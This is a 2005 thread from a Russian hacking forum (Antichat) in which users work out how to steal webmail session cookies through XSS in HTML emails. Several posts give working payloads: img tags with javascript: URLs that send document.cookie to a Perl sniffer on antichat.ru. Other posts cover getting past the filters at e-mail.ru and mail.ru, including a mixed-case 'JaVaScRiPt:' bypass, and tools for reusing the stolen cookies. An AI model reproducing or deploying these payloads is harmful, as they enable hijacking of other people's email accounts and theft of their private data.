Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Как можно получить куки ? (https://forum.antichat.xyz/showthread.php?t=6905)

VARVAR 04.06.2005 00:23
Как можно получить куки ?
 
Запустил у себя на бесплатном хосте (hut.ru) сниффер на perl. Работает отлично - рефку присылает. Но проблема в том, что не получается пока с куками.

Понял, что для передачи куков нужно послать письмо в html формате с ява-скриптом:

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

В скрипте есть адресс сниффера. Потом с лога сниффера забираем файлы куки, а дальше работаем с
проксомитроном (или др. редактором куков).

Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ?

Посоветуйте плиз, где у меня ошибка (можно в приват). Заранее благодарен, так как вижу, что этот вопрос интересует многих.

PinkPanther 04.06.2005 00:42
Фильтры на скрипты, теги, метасимволы.... Поэтому и не работает...=(

Майор 04.06.2005 10:58
Цитата:
Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ?
Почему ? раз работает, значит полезен :)

KEZ 04.06.2005 18:36
Почему? Чтото непонял, у тебя что куки скрипту не передаются

JazzzSummerMan 04.06.2005 19:14
может быть не работает сам XSS в твоей почте:
<img src="javascript:">

Может браузер не поддерживает функц. Image().
попробуй по-порядку

KEZ 04.06.2005 20:23
но это точно не изза бесплатного хостигна. скорее всего фильтрование со стороны клиента

VARVAR 04.06.2005 21:34
PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru.

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?

На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок.

<xtitle>Непонятный заголовок</xtitle>
</xhead>
<xbody>
<IMG src=xjavascript:document.images[0].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
</xbody>
</xhtml>

Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный.

Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.

Xattab 04.06.2005 22:26
http://forum.antichat.ru/showthread.php?p=43322
Здесь Майор писал рабочий на данный момент способ обхода фильтра для mail.ru.
В твоем случае это выглядит так:
<image src=JaVaScRiPt:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

Майор 05.06.2005 11:40
Цитата:
Сообщение от VARVAR
Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?
ты прав

VARVAR 07.06.2005 02:22
Thank you Майор & Xattab !

Интересно, а кто-нибудь юзал прогу Minibrowser v2.20 для подстановки куков. Очень интересная прога ! За исключением того, что не хочет открывать папки на mail.ru. На рамблере без проблем.

В принципе и Opera рулит, но не очень удобно делать подстановку снифф-куки.


Время: 01:39